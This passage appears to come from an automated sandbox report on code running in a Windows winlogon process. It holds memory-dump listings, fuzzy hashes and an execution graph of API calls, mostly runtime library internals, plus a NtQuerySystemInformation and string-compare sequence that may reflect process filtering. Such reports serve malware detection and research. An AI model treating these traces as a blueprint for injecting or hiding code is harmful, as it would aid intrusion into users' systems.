                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction ID: 347ffafee753238fd319f5b9069b8f4806714fee8752ca7774ef92717255233b
                                                  • Opcode Fuzzy Hash: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction Fuzzy Hash: DB112B36228F9092EB618F19E44425977E5F788B95F588260EF8D4BB65DF38C552CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: `managed vector destructor iterator'$ure'
                                                  • API String ID: 592178966-1581490017
                                                  • Opcode ID: 85a87bb11024578e2bec427d8c38cd0b0f4a35d12cc8a3acd2ec31d7a1335686
                                                  • Instruction ID: 9fcc8bf1e1032971ae0b243b943a657b5727766a4ef3ee8b729a9bbbdd56b4c7
                                                  • Opcode Fuzzy Hash: 85a87bb11024578e2bec427d8c38cd0b0f4a35d12cc8a3acd2ec31d7a1335686
                                                  • Instruction Fuzzy Hash: C9E08661A51F49A0DF018FA5E4452D87364DB59B55B48D1229A5C06311FA38D1E9C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: `eh vector copy constructor iterator'$ure'
                                                  • API String ID: 592178966-2675205102
                                                  • Opcode ID: 6d266e532462436e4859bb4742975a48e79c85926c4f17d2627f74bd81432aff
                                                  • Instruction ID: b926804a3ac5efd9302e3d298638c0c0596ba73d7b38bb7801b4a04196299ba6
                                                  • Opcode Fuzzy Hash: 6d266e532462436e4859bb4742975a48e79c85926c4f17d2627f74bd81432aff
                                                  • Instruction Fuzzy Hash: B9E0C262A11F49E0DF028FA5E4812D87364EB69B59F88D222CE5C07311EF38D1E8C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: std::bad_alloc::bad_alloc
                                                  • String ID: vector constructor iterator'$lue
                                                  • API String ID: 1875163511-1709709380
                                                  • Opcode ID: 5871adbce02aa8774d2d44c927412324eb05a701dec9d45e0cdc00cd11f5aded
                                                  • Instruction ID: cbd0b056a87a5a02dd8a17a300e7fcc1f548151ed6664e9a2268ecb8fd4e8be2
                                                  • Opcode Fuzzy Hash: 5871adbce02aa8774d2d44c927412324eb05a701dec9d45e0cdc00cd11f5aded
                                                  • Instruction Fuzzy Hash: D6D05E26211E95E1DE10EB88D888389A330F39874AF908111924D42575DF78CA46C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction ID: 92eff473101e3e4fd21d60c3b3a46525f2e1f95c08cd6c98d7383247a676db85
                                                  • Opcode Fuzzy Hash: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction Fuzzy Hash: 10118429A29F5091EB14CBAAA80C11977E0F789FD1F5C8024DE4E53725DF38D442C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction ID: a448e9a61b4a7f4dee5f4e5ca73fb4ef36227e5704ea70657e57231f34673553
                                                  • Opcode Fuzzy Hash: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction Fuzzy Hash: DCE06535A21A1086E7288FA6E80C34937E1FB88F0AF18C024C90907360DF7D8499CF80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction ID: 8d1ad1b366a1e146f143930365e223f03be595ec0e78fb98724f0cf46b7ecd0d
                                                  • Opcode Fuzzy Hash: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction Fuzzy Hash: F7E0E575631A5096E7289BA6E80C25977A1FB88B16F58C024C90907320EE388499CE10

                                                  Execution Graph

                                                  Execution Coverage:1.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:1397
                                                  Total number of Limit Nodes:20
                                                  execution_graph 8457 202c0af23f0 8458 202c0aef5e0 69 API calls 8457->8458 8459 202c0af23f9 8458->8459 8460 202c0aeb9ec 8461 202c0ae8fe4 _CallSETranslator 9 API calls 8460->8461 8462 202c0aeba21 8461->8462 8463 202c0ae8fe4 _CallSETranslator 9 API calls 8462->8463 8464 202c0aeba2f __except_validate_context_record 8463->8464 8465 202c0ae8fe4 _CallSETranslator 9 API calls 8464->8465 8466 202c0aeba73 8465->8466 8467 202c0ae8fe4 _CallSETranslator 9 API calls 8466->8467 8468 202c0aeba7c 8467->8468 8469 202c0ae8fe4 _CallSETranslator 9 API calls 8468->8469 8470 202c0aeba85 8469->8470 8483 202c0aea3b8 8470->8483 8473 202c0ae8fe4 _CallSETranslator 9 API calls 8474 202c0aebab5 __CxxCallCatchBlock 8473->8474 8490 202c0aea3f4 8474->8490 8476 202c0aebb8f __CxxCallCatchBlock 8477 202c0ae8fe4 _CallSETranslator 9 API calls 8476->8477 8478 202c0aebba2 8477->8478 8479 202c0ae8fe4 _CallSETranslator 9 API calls 8478->8479 8481 202c0aebbab 8479->8481 8484 202c0ae8fe4 _CallSETranslator 9 API calls 8483->8484 8485 202c0aea3c9 8484->8485 8486 202c0ae8fe4 _CallSETranslator 9 API calls 8485->8486 8487 202c0aea3d4 8485->8487 8486->8487 8488 202c0ae8fe4 _CallSETranslator 9 API calls 8487->8488 8489 202c0aea3e5 8488->8489 8489->8473 8489->8474 8491 202c0ae8fe4 _CallSETranslator 9 API calls 8490->8491 8492 202c0aea406 8491->8492 8493 202c0ae8fe4 _CallSETranslator 9 API calls 8492->8493 8495 202c0aea441 8492->8495 8494 202c0aea411 8493->8494 8494->8495 8496 202c0ae8fe4 _CallSETranslator 9 API calls 8494->8496 8497 202c0aea432 8496->8497 8497->8476 8498 202c0ae8cb8 8497->8498 8499 202c0ae8fe4 _CallSETranslator 9 API calls 8498->8499 8500 202c0ae8cc6 8499->8500 8500->8476 8501 202c0ae83ec 8504 202c0ae8d80 8501->8504 8503 202c0ae8415 8505 202c0ae8da1 8504->8505 8506 202c0ae8dd6 __std_exception_copy 8504->8506 8505->8506 8508 202c0aed038 8505->8508 8506->8503 8509 202c0aed04f 8508->8509 8510 202c0aed045 8508->8510 8511 202c0aedffc __std_exception_copy 11 API calls 8509->8511 8510->8509 8515 202c0aed06a 8510->8515 8512 202c0aed056 8511->8512 8513 202c0aedec0 _invalid_parameter_noinfo 49 API calls 8512->8513 8514 202c0aed062 8513->8514 8514->8506 8515->8514 8516 202c0aedffc __std_exception_copy 11 API calls 8515->8516 8516->8512 8517 202c0aee3ec 8518 202c0aee411 8517->8518 8527 202c0aee428 8517->8527 8519 202c0aedffc __std_exception_copy 11 API calls 8518->8519 8521 202c0aee416 8519->8521 8520 202c0aee4e0 8524 202c0aec84c 11 API calls 8520->8524 8522 202c0aedec0 _invalid_parameter_noinfo 49 API calls 8521->8522 8523 202c0aee421 8522->8523 8525 202c0aee538 8524->8525 8528 202c0aee540 8525->8528 8537 202c0aee572 8525->8537 8527->8520 8531 202c0aee4b8 8527->8531 8534 202c0aee475 8527->8534 8549 202c0aee630 8527->8549 8529 202c0aee094 __free_lconv_mon 11 API calls 8528->8529 8532 202c0aee547 8529->8532 8530 202c0aee5d1 8533 202c0aee094 __free_lconv_mon 11 API calls 8530->8533 8535 202c0aee498 8531->8535 8539 202c0aee094 __free_lconv_mon 11 API calls 8531->8539 8532->8535 8538 202c0aee094 __free_lconv_mon 11 API calls 8532->8538 8536 202c0aee5dc 8533->8536 8534->8535 8542 202c0aee094 __free_lconv_mon 11 API calls 8534->8542 8541 202c0aee094 __free_lconv_mon 11 API calls 8535->8541 8540 202c0aee5f5 8536->8540 8543 202c0aee094 __free_lconv_mon 11 API calls 8536->8543 8537->8530 8537->8537 8546 202c0aee617 8537->8546 8571 202c0af18a0 8537->8571 8538->8532 8539->8531 8544 202c0aee094 __free_lconv_mon 11 API calls 8540->8544 8541->8523 8542->8534 8543->8536 8544->8523 8547 202c0aedee0 _invalid_parameter_noinfo 17 API calls 8546->8547 8548 202c0aee62c 8547->8548 8550 202c0aee65e 8549->8550 8550->8550 8551 202c0aee01c __std_exception_copy 11 API calls 8550->8551 8552 202c0aee6a9 8551->8552 8553 202c0af18a0 49 API calls 8552->8553 8554 202c0aee6df 8553->8554 8555 202c0aedee0 _invalid_parameter_noinfo 17 API calls 8554->8555 8556 202c0aee7b3 8555->8556 8557 202c0aeeb04 23 API calls 8556->8557 8558 202c0aee896 8557->8558 8559 202c0aefef8 5 API calls 8558->8559 8560 202c0aee8c1 8559->8560 8580 202c0aee0e4 8560->8580 8563 202c0aee95d 8564 202c0aeeb04 23 API calls 8563->8564 8565 202c0aee98d 8564->8565 8566 202c0aefef8 5 API calls 8565->8566 8567 202c0aee9b6 8566->8567 8602 202c0aee260 8567->8602 8570 202c0aee630 59 API calls 8576 202c0af18bd 8571->8576 8572 202c0af18c2 8573 202c0af18d8 8572->8573 8574 202c0aedffc __std_exception_copy 11 API calls 8572->8574 8573->8537 8575 202c0af18cc 8574->8575 8577 202c0aedec0 _invalid_parameter_noinfo 49 API calls 8575->8577 8576->8572 8576->8573 8578 202c0af190c 8576->8578 8577->8573 8578->8573 8579 202c0aedffc __std_exception_copy 11 API calls 8578->8579 8579->8575 8581 202c0aee10e 8580->8581 8582 202c0aee132 8580->8582 8585 202c0aee11d FindFirstFileExW 8581->8585 8587 202c0aee094 __free_lconv_mon 11 API calls 8581->8587 8583 202c0aee18c 8582->8583 8584 202c0aee137 8582->8584 8586 202c0aef9cc MultiByteToWideChar 8583->8586 8584->8585 8588 202c0aee14c 8584->8588 8589 202c0aee094 __free_lconv_mon 11 API calls 8584->8589 8585->8563 8594 202c0aee1a8 8586->8594 8587->8585 8590 202c0aed35c 12 API calls 8588->8590 8589->8588 8590->8585 8591 202c0aee1af GetLastError 8592 202c0aedf70 11 API calls 8591->8592 8593 202c0aee1bc 8592->8593 8596 202c0aedffc __std_exception_copy 11 API calls 8593->8596 8594->8591 8597 202c0aee094 __free_lconv_mon 11 API calls 8594->8597 8600 202c0aee1dd 8594->8600 8601 202c0aee1ea 8594->8601 8595 202c0aef9cc MultiByteToWideChar 8599 202c0aee22e 8595->8599 8596->8585 8597->8600 8598 202c0aed35c 12 API calls 8598->8601 8599->8585 8599->8591 8600->8598 8601->8585 8601->8595 8603 202c0aee2ae 8602->8603 8604 202c0aee28a 8602->8604 8605 202c0aee308 8603->8605 8606 202c0aee2b4 8603->8606 8608 202c0aee094 __free_lconv_mon 11 API calls 8604->8608 8613 202c0aee299 8604->8613 8607 202c0aefa5c WideCharToMultiByte 8605->8607 8609 202c0aee2c9 8606->8609 8610 202c0aee094 __free_lconv_mon 11 API calls 8606->8610 8606->8613 8616 202c0aee32c 8607->8616 8608->8613 8611 202c0aed35c 12 API calls 8609->8611 8610->8609 8611->8613 8612 202c0aee333 GetLastError 8615 202c0aedf70 11 API calls 8612->8615 8613->8570 8614 202c0aee370 8614->8613 8618 202c0aefa5c WideCharToMultiByte 8614->8618 8619 202c0aee340 8615->8619 8616->8612 8616->8614 8617 202c0aee364 8616->8617 8620 202c0aee094 __free_lconv_mon 11 API calls 8616->8620 8621 202c0aed35c 12 API calls 8617->8621 8622 202c0aee3bc 8618->8622 8623 202c0aedffc __std_exception_copy 11 API calls 8619->8623 8620->8617 8621->8614 8622->8612 8622->8613 8623->8613 9247 202c0af46e8 9248 202c0af46ff 9247->9248 9249 202c0af46f9 CloseHandle 9247->9249 9249->9248 9250 202c0aebae6 9251 202c0ae8fe4 _CallSETranslator 9 API calls 9250->9251 9254 202c0aebaf3 __CxxCallCatchBlock 9251->9254 9252 202c0aebb37 RaiseException 9253 202c0aebb5e 9252->9253 9255 202c0aea3f4 __CxxCallCatchBlock 9 API calls 9253->9255 9254->9252 9260 202c0aebb66 9255->9260 9256 202c0aebb8f __CxxCallCatchBlock 9257 202c0ae8fe4 _CallSETranslator 9 API calls 9256->9257 9258 202c0aebba2 9257->9258 9259 202c0ae8fe4 _CallSETranslator 9 API calls 9258->9259 9261 202c0aebbab 9259->9261 9260->9256 9262 202c0ae8cb8 __CxxCallCatchBlock 9 API calls 9260->9262 9262->9256 7787 202c0ae20e4 NtQuerySystemInformation 7788 202c0ae2120 7787->7788 7789 202c0ae21f6 7788->7789 7790 202c0ae222b 7788->7790 7798 202c0ae2139 7788->7798 7791 202c0ae2230 7790->7791 7792 202c0ae229f 7790->7792 7807 202c0ae3198 GetProcessHeap HeapAlloc 7791->7807 7792->7789 7793 202c0ae22a4 7792->7793 7796 202c0ae3198 11 API calls 7793->7796 7795 202c0ae2171 StrCmpNIW 7795->7798 7799 202c0ae2248 7796->7799 7797 202c0ae2198 7797->7798 7801 202c0ae1c3c 7797->7801 7798->7789 7798->7795 7798->7797 7799->7789 7799->7799 7802 202c0ae1cc0 7801->7802 7803 202c0ae1c63 GetProcessHeap HeapAlloc 7801->7803 7802->7797 7803->7802 7804 202c0ae1c9e 7803->7804 7813 202c0ae1c08 7804->7813 7812 202c0ae31eb 7807->7812 7808 202c0ae32a9 GetProcessHeap HeapFree 7808->7799 7809 202c0ae32a4 7809->7808 7810 202c0ae3236 StrCmpNIW 7810->7812 7811 202c0ae1c3c 6 API calls 7811->7812 7812->7808 7812->7809 7812->7810 7812->7811 7814 202c0ae1c1f 7813->7814 7816 202c0ae1c28 GetProcessHeap HeapFree 7813->7816 7815 202c0ae1534 2 API calls 7814->7815 7815->7816 7816->7802 8861 202c0af6163 8864 202c0ae8d0c 8861->8864 8865 202c0ae8d36 8864->8865 8866 202c0ae8d24 8864->8866 8867 202c0ae8fe4 _CallSETranslator 9 API calls 8865->8867 8866->8865 8868 202c0ae8d2c 8866->8868 8869 202c0ae8d3b 8867->8869 8870 202c0ae8d34 8868->8870 8871 202c0ae8fe4 _CallSETranslator 9 API calls 8868->8871 8869->8870 8872 202c0ae8fe4 _CallSETranslator 9 API calls 8869->8872 8873 202c0ae8d5b 8871->8873 8872->8870 8874 202c0ae8fe4 _CallSETranslator 9 API calls 8873->8874 8875 202c0ae8d68 8874->8875 8876 202c0aecff8 23 API calls 8875->8876 8877 202c0ae8d71 8876->8877 8878 202c0aecff8 23 API calls 8877->8878 8879 202c0ae8d7d 8878->8879 7817 202c0ae7e80 7819 202c0ae7e89 __scrt_release_startup_lock 7817->7819 7818 202c0ae7e8d 7819->7818 7821 202c0aec8ac 7819->7821 7822 202c0aec8cc 7821->7822 7842 202c0aec8e3 7821->7842 7823 202c0aec8ea 7822->7823 7824 202c0aec8d4 7822->7824 7855 202c0aef5e0 7823->7855 7825 202c0aedffc __std_exception_copy 11 API calls 7824->7825 7827 202c0aec8d9 7825->7827 7852 202c0aedec0 7827->7852 7836 202c0aec961 7838 202c0aedffc __std_exception_copy 11 API calls 7836->7838 7837 202c0aec979 7839 202c0aec684 23 API calls 7837->7839 7840 202c0aec966 7838->7840 7843 202c0aec995 7839->7843 7841 202c0aee094 __free_lconv_mon 11 API calls 7840->7841 7841->7842 7842->7818 7845 202c0aec9c7 7843->7845 7847 202c0aec9e0 7843->7847 7851 202c0aec99b 7843->7851 7844 202c0aee094 __free_lconv_mon 11 API calls 7844->7842 7846 202c0aee094 __free_lconv_mon 11 API calls 7845->7846 7848 202c0aec9d0 7846->7848 7847->7847 7849 202c0aee094 __free_lconv_mon 11 API calls 7847->7849 7850 202c0aee094 __free_lconv_mon 11 API calls 7848->7850 7849->7851 7850->7842 7851->7844 7885 202c0aedd58 7852->7885 7856 202c0aef5ed 7855->7856 7857 202c0aec8ef 7855->7857 8022 202c0aed84c 7856->8022 7861 202c0aeecc4 GetModuleFileNameW 7857->7861 7859 202c0aef61c 8039 202c0aef2b8 7859->8039 7862 202c0aeed1d 7861->7862 7863 202c0aeed09 GetLastError 7861->7863 7865 202c0aeeb04 23 API calls 7862->7865 8218 202c0aedf70 7863->8218 7867 202c0aeed4b 7865->7867 7866 202c0aeed16 7868 202c0ae7d30 _log10_special 8 API calls 7866->7868 7870 202c0aeed5c 7867->7870 8223 202c0aefef8 7867->8223 7872 202c0aec906 7868->7872 8226 202c0aeeba8 7870->8226 7873 202c0aec684 7872->7873 7875 202c0aec6c2 7873->7875 7877 202c0aec72e 7875->7877 8240 202c0aef990 7875->8240 7876 202c0aec81f 7879 202c0aec84c 7876->7879 7877->7876 7878 202c0aef990 23 API calls 7877->7878 7878->7877 7880 202c0aec864 7879->7880 7881 202c0aec89c 7879->7881 7880->7881 7882 202c0aee01c __std_exception_copy 11 API calls 7880->7882 7881->7836 7881->7837 7883 202c0aec892 7882->7883 7884 202c0aee094 __free_lconv_mon 11 API calls 7883->7884 7884->7881 7886 202c0aedd83 7885->7886 7893 202c0aeddf4 7886->7893 7889 202c0aeddcd 7891 202c0aedde2 7889->7891 7892 202c0aed0f0 _invalid_parameter_noinfo 28 API calls 7889->7892 7891->7842 7892->7891 7916 202c0aedb3c 7893->7916 7898 202c0aeddaa 7898->7889 7903 202c0aed0f0 7898->7903 7904 202c0aed0ff GetLastError 7903->7904 7905 202c0aed148 7903->7905 7906 202c0aed114 7904->7906 7905->7889 7907 202c0aed9b8 _invalid_parameter_noinfo 14 API calls 7906->7907 7908 202c0aed12e SetLastError 7907->7908 7908->7905 7909 202c0aed151 7908->7909 7910 202c0aed0f0 _invalid_parameter_noinfo 26 API calls 7909->7910 7911 202c0aed177 7910->7911 7965 202c0af0d80 7911->7965 7917 202c0aedb58 GetLastError 7916->7917 7918 202c0aedb93 7916->7918 7919 202c0aedb68 7917->7919 7918->7898 7922 202c0aedba8 7918->7922 7929 202c0aed9b8 7919->7929 7923 202c0aedbc4 GetLastError SetLastError 7922->7923 7924 202c0aedbdc 7922->7924 7923->7924 7924->7898 7925 202c0aedee0 IsProcessorFeaturePresent 7924->7925 7926 202c0aedef3 7925->7926 7943 202c0aedbf4 7926->7943 7930 202c0aed9d7 FlsGetValue 7929->7930 7932 202c0aed9ec 7929->7932 7931 202c0aed9e4 SetLastError 7930->7931 7930->7932 7931->7918 7932->7931 7933 202c0aee01c __std_exception_copy 11 API calls 7932->7933 7934 202c0aeda0e 7933->7934 7935 202c0aeda2c FlsSetValue 7934->7935 7938 202c0aeda1c 7934->7938 7936 202c0aeda4a 7935->7936 7937 202c0aeda38 FlsSetValue 7935->7937 7939 202c0aed4e4 __std_exception_copy 11 API calls 7936->7939 7937->7938 7941 202c0aee094 __free_lconv_mon 11 API calls 7938->7941 7940 202c0aeda52 7939->7940 7942 202c0aee094 __free_lconv_mon 11 API calls 7940->7942 7941->7931 7942->7931 7944 202c0aedc2e _invalid_parameter_noinfo 7943->7944 7945 202c0aedc56 RtlCaptureContext RtlLookupFunctionEntry 7944->7945 7946 202c0aedc90 RtlVirtualUnwind 7945->7946 7947 202c0aedcc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7945->7947 7946->7947 7948 202c0aedd18 _invalid_parameter_noinfo 7947->7948 7951 202c0ae7d30 7948->7951 7952 202c0ae7d39 7951->7952 7953 202c0ae7d44 GetCurrentProcess TerminateProcess 7952->7953 7954 202c0ae8508 IsProcessorFeaturePresent 7952->7954 7955 202c0ae8520 7954->7955 7960 202c0ae86fc RtlCaptureContext 7955->7960 7961 202c0ae8716 RtlLookupFunctionEntry 7960->7961 7962 202c0ae872c RtlVirtualUnwind 7961->7962 7963 202c0ae8533 7961->7963 7962->7961 7962->7963 7964 202c0ae84d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7963->7964 7966 202c0aed19f 7965->7966 7967 202c0af0d99 7965->7967 7969 202c0af0dec 7966->7969 7967->7966 7973 202c0af13ac 7967->7973 7970 202c0aed1af 7969->7970 7971 202c0af0e05 7969->7971 7970->7889 7971->7970 8019 202c0aef640 7971->8019 7982 202c0aed778 GetLastError 7973->7982 7975 202c0af13bb 7981 202c0af1401 7975->7981 8018 202c0aed2ec EnterCriticalSection 7975->8018 7981->7966 7983 202c0aed79c FlsGetValue 7982->7983 7984 202c0aed7b9 FlsSetValue 7982->7984 7986 202c0aed7a9 7983->7986 7987 202c0aed7b3 7983->7987 7985 202c0aed7cb 7984->7985 7984->7986 7989 202c0aee01c __std_exception_copy 11 API calls 7985->7989 7988 202c0aed825 SetLastError 7986->7988 7987->7984 7990 202c0aed832 7988->7990 7997 202c0aed845 7988->7997 7991 202c0aed7da 7989->7991 7990->7975 7992 202c0aed7f8 FlsSetValue 7991->7992 7993 202c0aed7e8 FlsSetValue 7991->7993 7995 202c0aed816 7992->7995 7996 202c0aed804 FlsSetValue 7992->7996 7994 202c0aed7f1 7993->7994 7998 202c0aee094 __free_lconv_mon 11 API calls 7994->7998 7999 202c0aed4e4 __std_exception_copy 11 API calls 7995->7999 7996->7994 8000 202c0aed85d FlsGetValue 7997->8000 8001 202c0aed878 FlsSetValue 7997->8001 7998->7986 8002 202c0aed81e 7999->8002 8003 202c0aed872 8000->8003 8007 202c0aed86a 8000->8007 8004 202c0aed885 8001->8004 8001->8007 8005 202c0aee094 __free_lconv_mon 11 API calls 8002->8005 8003->8001 8006 202c0aee01c __std_exception_copy 11 API calls 8004->8006 8005->7988 8008 202c0aed894 8006->8008 8007->7975 8009 202c0aed8b2 FlsSetValue 8008->8009 8010 202c0aed8a2 FlsSetValue 8008->8010 8011 202c0aed8d0 8009->8011 8012 202c0aed8be FlsSetValue 8009->8012 8013 202c0aed8ab 8010->8013 8015 202c0aed4e4 __std_exception_copy 11 API calls 8011->8015 8012->8013 8014 202c0aee094 __free_lconv_mon 11 API calls 8013->8014 8014->8007 8016 202c0aed8d8 8015->8016 8017 202c0aee094 __free_lconv_mon 11 API calls 8016->8017 8017->8007 8020 202c0aed778 _invalid_parameter_noinfo 23 API calls 8019->8020 8021 202c0aef649 8020->8021 8023 202c0aed85d FlsGetValue 8022->8023 8024 202c0aed878 FlsSetValue 8022->8024 8025 202c0aed872 8023->8025 8036 202c0aed86a 8023->8036 8026 202c0aed885 8024->8026 8024->8036 8025->8024 8027 202c0aee01c __std_exception_copy 11 API calls 8026->8027 8028 202c0aed894 8027->8028 8029 202c0aed8b2 FlsSetValue 8028->8029 8030 202c0aed8a2 FlsSetValue 8028->8030 8031 202c0aed8d0 8029->8031 8032 202c0aed8be FlsSetValue 8029->8032 8033 202c0aed8ab 8030->8033 8035 202c0aed4e4 __std_exception_copy 11 API calls 8031->8035 8032->8033 8034 202c0aee094 __free_lconv_mon 11 API calls 8033->8034 8034->8036 8037 202c0aed8d8 8035->8037 8036->7859 8038 202c0aee094 __free_lconv_mon 11 API calls 8037->8038 8038->8036 8062 202c0aef528 8039->8062 8044 202c0aef30a 8044->7857 8047 202c0aef323 8048 202c0aee094 __free_lconv_mon 11 API calls 8047->8048 8048->8044 8049 202c0aef332 8049->8049 8088 202c0aef65c 8049->8088 8052 202c0aef42e 8053 202c0aedffc __std_exception_copy 11 API calls 8052->8053 8055 202c0aef433 8053->8055 8054 202c0aef489 8057 202c0aef4f0 8054->8057 8099 202c0aeede8 8054->8099 8058 202c0aee094 __free_lconv_mon 11 API calls 8055->8058 8056 202c0aef448 8056->8054 8059 202c0aee094 __free_lconv_mon 11 API calls 8056->8059 8061 202c0aee094 __free_lconv_mon 11 API calls 8057->8061 8058->8044 8059->8054 8061->8044 8063 202c0aef54b 8062->8063 8067 202c0aef555 8063->8067 8114 202c0aed2ec EnterCriticalSection 8063->8114 8069 202c0aef2ed 8067->8069 8071 202c0aed84c 16 API calls 8067->8071 8074 202c0aeefb8 8069->8074 8072 202c0aef61c 8071->8072 8073 202c0aef2b8 69 API calls 8072->8073 8073->8069 8115 202c0aeeb04 8074->8115 8076 202c0aeefcc 8077 202c0aeefea 8076->8077 8078 202c0aeefd8 GetOEMCP 8076->8078 8079 202c0aeefef GetACP 8077->8079 8080 202c0aeefff 8077->8080 8078->8080 8079->8080 8080->8044 8081 202c0aed35c 8080->8081 8082 202c0aed3a7 8081->8082 8086 202c0aed36b __std_exception_copy 8081->8086 8083 202c0aedffc __std_exception_copy 11 API calls 8082->8083 8085 202c0aed3a5 8083->8085 8084 202c0aed38e HeapAlloc 8084->8085 8084->8086 8085->8047 8085->8049 8086->8082 8086->8084 8087 202c0aec1ac __std_exception_copy 2 API calls 8086->8087 8087->8086 8089 202c0aeefb8 25 API calls 8088->8089 8090 202c0aef689 8089->8090 8091 202c0aef7df 8090->8091 8092 202c0aef6c6 IsValidCodePage 8090->8092 8098 202c0aef6e0 _invalid_parameter_noinfo 8090->8098 8093 202c0ae7d30 _log10_special 8 API calls 8091->8093 8092->8091 8094 202c0aef6d7 8092->8094 8095 202c0aef425 8093->8095 8096 202c0aef706 GetCPInfo 8094->8096 8094->8098 8095->8052 8095->8056 8096->8091 8096->8098 8131 202c0aef0d0 8098->8131 8217 202c0aed2ec EnterCriticalSection 8099->8217 8116 202c0aeeb28 8115->8116 8117 202c0aeeb23 8115->8117 8116->8117 8118 202c0aed778 